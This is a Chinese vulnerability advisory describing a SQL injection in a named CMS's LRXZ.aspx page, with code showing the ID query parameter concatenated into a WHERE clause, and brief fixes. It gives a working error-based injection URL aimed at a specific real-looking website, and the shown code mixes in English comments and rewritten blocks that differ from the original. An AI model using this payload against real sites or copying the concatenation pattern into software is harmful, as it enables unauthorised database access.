### 0x01 漏洞框架
系统:盈动信息发布系统
盈动信息发布系统为杭州东方盈动计算机网络工程有限公司一款cms产品。
注入:
问题文件:/sites/main/LRXZ.aspx
问题参数:ID
### 0x02 漏洞详情
代码分析:
```
/// <summary>
/// Page entry point: reads the "ID" query-string value (falling back to "465" when it is
/// absent), echoes it into lblID, and builds the WHERE clause used by GetPageInfo and
/// BindData by concatenating that value into a string.
/// </summary>
/// <param name="sender">Standard ASP.NET event source.</param>
/// <param name="e">Standard ASP.NET event arguments.</param>
protected void Page_Load(object sender, EventArgs e)
{
略...
string text;
if (this.Page.Request.QueryString["ID"] != null)
{
text = this.Page.Request.QueryString["ID"];/* read the request parameter: untrusted input, used below without validation */
}
else
{
text = "465";
}
this.lblID.Text = text;
string condition = "ClassID='" + this.lblID.Text + "' AND WebID=1 AND Deleted='0'";/* SQL built by string concatenation: the request value sits inside a quoted literal with no escaping or parameterization */
this.GetPageInfo(condition);/* injection point A */
this.BindData(condition);/* injection point B */
}
}
```
this.GetPageInfo分析:
```
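/// <summary>
/// Runs the Get_SiteData_ByPagination stored procedure in count mode (@DoCount = true)
/// against the Articles table and stores the returned count in PageInfo.
/// </summary>
/// <param name="condition">
/// Raw WHERE-clause text, bound as the @StrWhere parameter. Binding it as a parameter
/// only protects this call; the procedure receives the text itself and (per this page)
/// applies it as part of its query, and the caller in this page builds it by
/// concatenating the ID query-string value. The fix therefore belongs at the call site
/// (validate the ID and parameterize the value), not in this method.
/// </param>
private void GetPageInfo(string condition)
{
    // Dispose the connection and command on every path; the original only called
    // Close() after a successful ExecuteScalar, leaking the connection on exceptions.
    using (SqlConnection sqlConnection = new SqlConnection(Globals.get_ConnectStr()))
    using (SqlCommand sqlCommand = new SqlCommand("Get_SiteData_ByPagination", sqlConnection))
    {
        sqlCommand.CommandType = CommandType.StoredProcedure;
        sqlCommand.Parameters.Add("@TblName", SqlDbType.NVarChar, 255).Value = "Articles";
        sqlCommand.Parameters.Add("@PageSize", SqlDbType.Int).Value = this.PageInfo.get_PageSize();
        sqlCommand.Parameters.Add("@PageIndex", SqlDbType.Int).Value = 1;
        sqlCommand.Parameters.Add("@DoCount", SqlDbType.Bit).Value = true;
        // @StrWhere carries caller-built WHERE text into the stored procedure unchanged.
        sqlCommand.Parameters.Add("@StrWhere", SqlDbType.NVarChar, 1500).Value = condition;
        sqlConnection.Open();
        this.PageInfo.set_RecordCount((int)sqlCommand.ExecuteScalar());
    }
}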
```
this.BindData分析:
```
/// <summary>
/// Binds mydatalist to the rows that CreateSource returns for the given WHERE clause.
/// </summary>
/// <param name="condition">Raw WHERE-clause text, forwarded unchanged to CreateSource.</param>
private void BindData(string condition)
{
this.mydatalist.DataSource = this.CreateSource(condition);/* follow this call: the condition string is forwarded as-is */
略...
}
this.CreateSource:
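/// <summary>
/// Runs the Get_SiteData_ByPagination stored procedure in row mode (@DoCount = false)
/// for the current page of the Articles table, ordered by "OnTop DESC, UpdateTime",
/// and returns the resulting rows as a DataView.
/// </summary>
/// <param name="condition">
/// Raw WHERE-clause text, bound as the @StrWhere parameter. As in GetPageInfo, the
/// parameter binding only protects this call: the procedure receives the text itself,
/// and the caller in this page builds it by concatenating the ID query-string value.
/// Validation and parameterization of the ID must happen at the call site.
/// </param>
/// <returns>The default view of the "Guest" table filled by the adapter.</returns>
private ICollection CreateSource(string condition)
{
    // The DataSet outlives this method (its DefaultView is returned), so it is not disposed here.
    DataSet dataSet = new DataSet("GuestList");
    // Dispose connection, command and adapter on every path; the original only
    // called Close() after a successful Fill, leaking the connection on exceptions.
    using (SqlConnection sqlConnection = new SqlConnection(Globals.get_ConnectStr()))
    using (SqlCommand sqlCommand = new SqlCommand("Get_SiteData_ByPagination", sqlConnection))
    {
        sqlCommand.CommandType = CommandType.StoredProcedure;
        sqlCommand.Parameters.Add("@TblName", SqlDbType.NVarChar, 255).Value = "Articles";
        sqlCommand.Parameters.Add("@PageSize", SqlDbType.Int).Value = this.PageInfo.get_PageSize();
        sqlCommand.Parameters.Add("@PageIndex", SqlDbType.Int).Value = this.PageInfo.get_CurrentPageIndex();
        sqlCommand.Parameters.Add("@DoCount", SqlDbType.Bit).Value = false;
        sqlCommand.Parameters.Add("@FldName", SqlDbType.NVarChar, 255).Value = "OnTop DESC, UpdateTime";
        sqlCommand.Parameters.Add("@KeyFld", SqlDbType.NVarChar, 255).Value = "NewsID";
        sqlCommand.Parameters.Add("@OrderType", SqlDbType.Bit).Value = true;
        // @StrWhere carries caller-built WHERE text into the stored procedure unchanged.
        sqlCommand.Parameters.Add("@StrWhere", SqlDbType.NVarChar, 1500).Value = condition;
        using (SqlDataAdapter sqlDataAdapter = new SqlDataAdapter(sqlCommand))
        {
            // Open explicitly, as the original did, rather than relying on Fill's implicit open.
            sqlConnection.Open();
            sqlDataAdapter.Fill(dataSet, "Guest");
        }
    }
    return dataSet.Tables["Guest"].DefaultView;
}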
```
漏洞利用:
http://www.jhjdedu.org/sites/main/LRXZ.aspx?id=2'and 1=@@version and'1'='1

Pocsuite:

### 0x03 修复方式
1、对漏洞文件的 ID 参数进行过滤与校验
2、使用加速乐等防护产品